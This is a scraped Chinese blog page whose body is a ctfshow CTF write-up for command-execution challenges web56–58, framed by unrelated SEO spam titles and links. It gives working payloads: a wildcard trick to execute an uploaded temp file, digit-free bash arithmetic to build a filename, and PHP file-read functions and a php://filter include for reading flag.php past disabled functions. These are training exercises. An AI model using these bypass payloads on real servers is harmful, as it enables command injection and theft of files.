当前位置: 首页 > news >正文

欧美男女直接做的视频网站如何推广seo

欧美男女直接做的视频网站,如何推广seo,网站中心,附近哪个厂子招工目录 1、web56 2、web57 3、web58 1、web56 命令执行&#xff0c;需要严格的过滤 新增过滤数字&#xff0c;只能采用上一题临时文件上传的方法&#xff1a; <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><…

目录

1、web56 

2、web57

3、web58


1、web56 

命令执行,需要严格的过滤

新增过滤数字,只能采用上一题临时文件上传的方法:

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>POST数据包POC</title>
</head>
<body>
<form action="https://f135ee89-cbf7-464b-9e19-a07aec56fd3f.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接--><label for="file">文件名:</label><input type="file" name="file" id="file"><br><input type="submit" name="submit" value="提交">
</form>
</body>
</html>

payload:?c=.%20/???/????????[@-[] 

2、web57

命令执行,需要严格的过滤,已测试,可绕

先说两个东西,在 Linux 下:

$(())=0
$((~ $(()) ))=-1

这里说了 flag 在 36.php,那么我们只需要构造 36,但是数字被过滤了。

由于前面说的只有 -1,因此我们对 36 进行取反,得到 -37,对 -37 再次取反即可得到 36。

根据 $((~ $(()) ))=-1,我们进行拼接,构造出 -37

$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))

再对其进行取反得到 36

$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

构造 payload:

?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

拿到 flag:ctfshow{37b0df2c-1256-4779-93e8-715022cb9673}

3、web58

命令执行,突破禁用函数

调用 system 函数,发现函数被禁用

这里使用 show_source 或者 highlight_file,构造 payload:

c=show_source('flag.php');
c=highlight_file('flag.php');

拿到 flag:ctfshow{7d992144-9afa-434e-a610-5af9bc9e1600}

也可以直接将 php 代码传给 eval 函数让其执行,构造 payload:

c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");

还在网上还看到了很多其他奇思妙想的解法,格局一下就打开了

(1)利用 copy 函数

c=copy("flag.php","flag.txt");

执行后直接访问 flag.txt

(2)rename 函数

通过将 flag.php 重命名为 txt 文件,之后直接访问读取,和上面的 copy 差不多

(3)file_get_contents 函数

使用 file_get_contents 进行读取,再配合 echo 输出,payload:

c=echo file_get_contents("flag.php");

(4)readfile 函数

payload:

c=readfile("flag.php");

 

(5) file 函数

payload:

c=print_r(file("flag.php"));     

更多其他情况和方法可以参考羽师傅的博客 

http://www.hkea.cn/news/6293/

相关文章:

  • 网站子页面设计2020国内十大小说网站排名
  • 素材设计做的好的网站有哪些世界杯积分榜排名
  • 廊坊网站快速排名优化营销管理系统
  • 网站产品预算百度首页百度一下
  • 上海高端网站设计网络营销和网络推广
  • 免费做易拉宝网站腾讯网qq网站
  • 怎么看网站用的什么cms网站优化流程
  • 固始网站制作新闻摘抄2022最新5篇
  • b站推广入口mba智库市场监督管理局电话
  • wordpress 图片 优化长沙网站搭建优化
  • 碑林微网站建设头条今日头条新闻头条
  • 建网站能挣钱吗河南seo技术教程
  • 下载好模板该怎么做网站优化网站的步骤
  • php动态网站开发实训教程湖南seo优化公司
  • 找客户网优化品牌seo关键词
  • wordpress浏览次数插件seo优化怎么做
  • wordpress电影seo建站工具
  • 做网站公司长沙哪家好软文300字案例
  • 网站建设的税率今日头条郑州头条新闻
  • 公司网站建设行业怎么样关键词在线试听
  • 辽宁大连建设工程信息网站女生学市场营销好吗
  • 做视频在线观看网站微信广告投放收费标准
  • 网站建设联系互联网营销师是什么
  • 恩施网站建设教程北京it培训机构哪家好
  • 某集团中英文双语网站源码seog
  • 汽车logo设计图片创意seo广告平台
  • 交城有做网站的吗厦门seo招聘
  • 世界免费b2b网站大全网页设计代码案例
  • 广告网站留电话不用验证码公司网站建设教程
  • html网站实例上海aso优化公司